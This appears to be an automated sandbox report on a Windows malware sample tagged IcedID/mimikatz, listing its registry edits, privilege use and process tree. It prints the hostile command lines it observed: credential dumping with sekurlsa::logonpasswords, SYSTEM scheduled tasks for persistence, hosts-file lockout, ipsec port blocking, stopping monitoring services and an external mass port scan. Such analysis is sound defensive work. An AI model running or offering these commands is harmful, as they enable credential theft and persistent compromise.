\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nspfoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 512 cmd.exe 972 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023cb9-6.dat nsis_installer_2 behavioral2/files/0x0008000000023cda-14.dat nsis_installer_1 behavioral2/files/0x0008000000023cda-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bmesabc.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 972 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 624 schtasks.exe 3156 schtasks.exe 3148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1328 bmesabc.exe Token: SeDebugPrivilege 3892 bmesabc.exe Token: SeDebugPrivilege 4988 vfshost.exe Token: SeDebugPrivilege 2324 nbriuecau.exe Token: SeLockMemoryPrivilege 1936 ysiisu.exe Token: SeLockMemoryPrivilege 1936 ysiisu.exe Token: SeDebugPrivilege 3932 nbriuecau.exe Token: SeDebugPrivilege 408 nbriuecau.exe Token: SeDebugPrivilege 4420 nbriuecau.exe Token: SeDebugPrivilege 32 nbriuecau.exe Token: SeDebugPrivilege 4608 nbriuecau.exe Token: SeDebugPrivilege 2200 nbriuecau.exe Token: SeDebugPrivilege 5048 nbriuecau.exe Token: SeDebugPrivilege 3400 nbriuecau.exe Token: SeDebugPrivilege 3036 nbriuecau.exe Token: SeDebugPrivilege 2516 nbriuecau.exe Token: SeDebugPrivilege 3120 nbriuecau.exe Token: SeDebugPrivilege 1172 nbriuecau.exe Token: SeDebugPrivilege 3976 nbriuecau.exe Token: SeDebugPrivilege 400 nbriuecau.exe Token: SeDebugPrivilege 3012 nbriuecau.exe Token: SeDebugPrivilege 1120 nbriuecau.exe Token: SeDebugPrivilege 2840 nbriuecau.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe 1328 bmesabc.exe 1328 bmesabc.exe 3892 bmesabc.exe 3892 bmesabc.exe 4160 xohudmc.exe 2676 nspfoo.exe 3868 bmesabc.exe 3868 bmesabc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 512 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe 84 PID 2364 wrote to memory of 512 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe 84 PID 2364 wrote to memory of 512 2364 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe 84 PID 512 wrote to memory of 972 512 cmd.exe 86 PID 512 wrote to memory of 972 512 cmd.exe 86 PID 512 wrote to memory of 972 512 cmd.exe 86 PID 512 wrote to memory of 1328 512 cmd.exe 91 PID 512 wrote to memory of 1328 512 cmd.exe 91 PID 512 wrote to memory of 1328 512 cmd.exe 91 PID 3892 wrote to memory of 4368 3892 bmesabc.exe 93 PID 3892 wrote to memory of 4368 3892 bmesabc.exe 93 PID 3892 wrote to memory of 4368 3892 bmesabc.exe 93 PID 4368 wrote to memory of 2332 4368 cmd.exe 95 PID 4368 wrote to memory of 2332 4368 cmd.exe 95 PID 4368 wrote to memory of 2332 4368 cmd.exe 95 PID 4368 wrote to memory of 1532 4368 cmd.exe 96 PID 4368 wrote to memory of 1532 4368 cmd.exe 96 PID 4368 wrote to memory of 1532 4368 cmd.exe 96 PID 4368 wrote to memory of 2128 4368 cmd.exe 97 PID 4368 wrote to memory of 2128 4368 cmd.exe 97 PID 4368 wrote to memory of 2128 4368 cmd.exe 97 PID 4368 wrote to memory of 2248 4368 cmd.exe 98 PID 4368 wrote to memory of 2248 4368 cmd.exe 98 PID 4368 wrote to memory of 2248 4368 cmd.exe 98 PID 4368 wrote to memory of 4884 4368 cmd.exe 99 PID 4368 wrote to memory of 4884 4368 cmd.exe 99 PID 4368 wrote to memory of 4884 4368 cmd.exe 99 PID 4368 wrote to memory of 3400 4368 cmd.exe 100 PID 4368 wrote to memory of 3400 4368 cmd.exe 100 PID 4368 wrote to memory of 3400 4368 cmd.exe 100 PID 3892 wrote to memory of 4512 3892 bmesabc.exe 104 PID 3892 wrote to memory of 4512 3892 bmesabc.exe 104 PID 3892 wrote to memory of 4512 3892 bmesabc.exe 104 PID 3892 wrote to memory of 792 3892 bmesabc.exe 106 PID 3892 wrote to memory of 792 3892 bmesabc.exe 106 PID 3892 wrote to memory of 792 3892 bmesabc.exe 106 PID 3892 wrote to memory of 2496 3892 bmesabc.exe 108 PID 3892 wrote to memory of 2496 3892 bmesabc.exe 108 PID 3892 wrote to memory of 2496 3892 bmesabc.exe 108 PID 3892 wrote to memory of 440 3892 bmesabc.exe 112 PID 3892 wrote to memory of 440 3892 bmesabc.exe 112 PID 3892 wrote to memory of 440 3892 bmesabc.exe 112 PID 440 wrote to memory of 2144 440 cmd.exe 114 PID 440 wrote to memory of 2144 440 cmd.exe 114 PID 440 wrote to memory of 2144 440 cmd.exe 114 PID 2144 wrote to memory of 1484 2144 wpcap.exe 115 PID 2144 wrote to memory of 1484 2144 wpcap.exe 115 PID 2144 wrote to memory of 1484 2144 wpcap.exe 115 PID 1484 wrote to memory of 3340 1484 net.exe 117 PID 1484 wrote to memory of 3340 1484 net.exe 117 PID 1484 wrote to memory of 3340 1484 net.exe 117 PID 2144 wrote to memory of 1644 2144 wpcap.exe 118 PID 2144 wrote to memory of 1644 2144 wpcap.exe 118 PID 2144 wrote to memory of 1644 2144 wpcap.exe 118 PID 1644 wrote to memory of 4272 1644 net.exe 120 PID 1644 wrote to memory of 4272 1644 net.exe 120 PID 1644 wrote to memory of 4272 1644 net.exe 120 PID 2144 wrote to memory of 1684 2144 wpcap.exe 121 PID 2144 wrote to memory of 1684 2144 wpcap.exe 121 PID 2144 wrote to memory of 1684 2144 wpcap.exe 121 PID 1684 wrote to memory of 544 1684 net.exe 123 PID 1684 wrote to memory of 544 1684 net.exe 123 PID 1684 wrote to memory of 544 1684 net.exe 123 PID 2144 wrote to memory of 672 2144 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1688
-
C:\Windows\TEMP\ilsrygknu\ysiisu.exe"C:\Windows\TEMP\ilsrygknu\ysiisu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bisbgtln\bmesabc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:972
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1328
-
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4884
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3400
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2496
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\tqgibwews\cuincnwui\wpcap.exeC:\Windows\tqgibwews\cuincnwui\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4272
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:544
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:672 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3352
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1148
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2984
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4264
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2628 -
C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exeC:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tqgibwews\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\tqgibwews\Corporate\vfshost.exeC:\Windows\tqgibwews\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wisbvlvns" /ru system /tr "cmd /c C:\Windows\ime\bmesabc.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4400 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wisbvlvns" /ru system /tr "cmd /c C:\Windows\ime\bmesabc.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtigcicuh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bisbgtln\bmesabc.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3188 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtigcicuh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bisbgtln\bmesabc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtueuuysy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilsrygknu\ysiisu.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3168 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtueuuysy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilsrygknu\ysiisu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3552
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1528
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1848
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5032
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:408
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3112
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4416
-
-
